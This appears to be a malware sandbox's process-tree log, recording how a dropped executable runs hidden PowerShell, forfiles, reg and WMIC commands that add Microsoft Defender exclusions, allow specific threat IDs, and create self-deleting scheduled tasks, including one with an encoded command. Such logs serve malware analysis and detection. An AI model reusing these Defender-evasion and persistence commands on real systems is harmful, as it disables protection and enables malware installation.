C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:1148
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:1440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Drops file in System32 directory
PID:964 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:1736
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2980
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:884
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Drops file in System32 directory
PID:2320 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:1804
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2232 -s 6642⤵PID:2704
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240428093217.log C:\Windows\Logs\CBS\CbsPersist_20240428093217.cab1⤵
- Drops file in Windows directory
PID:1712
-
C:\Windows\system32\taskeng.exetaskeng.exe {569D9B0F-A976-4825-81AE-E7B27B985B5E} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:540
-
C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\PbVgkoeGEfQyDQK\OOoMkQq.exeC:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\PbVgkoeGEfQyDQK\OOoMkQq.exe Wt /eZwdidIFua 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1280 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2152
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2960
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2324
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1972
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1964
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1596
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1592
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1292
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1320
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2904
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2696
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1840
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2756
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1724
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1608
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAxjLAFPA" /SC once /ST 02:59:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAxjLAFPA"3⤵PID:632
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAxjLAFPA"3⤵PID:1944
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2652
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:323⤵PID:1456
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2036 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:643⤵PID:1324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2148 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:323⤵PID:1268
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵PID:2912
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:643⤵PID:1156
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵PID:2304
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\nlcUipsDcFbdntMB\KZXvezkN\HMUaiCGSHWNcoODl.wsf"3⤵PID:1356
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\nlcUipsDcFbdntMB\KZXvezkN\HMUaiCGSHWNcoODl.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2436 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1568 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1148 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2560 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:552 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2316 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1240 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1840 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2676 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1636 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1724 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2884 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2540 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1752 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:832 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1516 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2428 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:812 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2616 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵PID:584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:644⤵PID:3020
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:324⤵PID:1992
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:644⤵PID:2600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:324⤵PID:1536
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:644⤵PID:2916
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:324⤵PID:676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:644⤵PID:2396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:324⤵PID:1736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:644⤵PID:784
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:324⤵PID:2316
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:644⤵PID:2696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2140
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1312
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:324⤵PID:2016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:644⤵PID:2952
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵PID:2884
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵PID:2540
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 02:14:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\WifcjtG.exe\" aV /RWwYdidxv 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1944 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"3⤵PID:832
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\WifcjtG.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\WifcjtG.exe aV /RWwYdidxv 385118 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2480 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1700
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2036
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1452
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2256
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1268
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2912
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:3020
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2388
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2456
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2860
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2020
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1460
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:1684
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1440
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1680
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:664
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"3⤵PID:1320
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2684
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:920
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2108 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2292
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2636
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
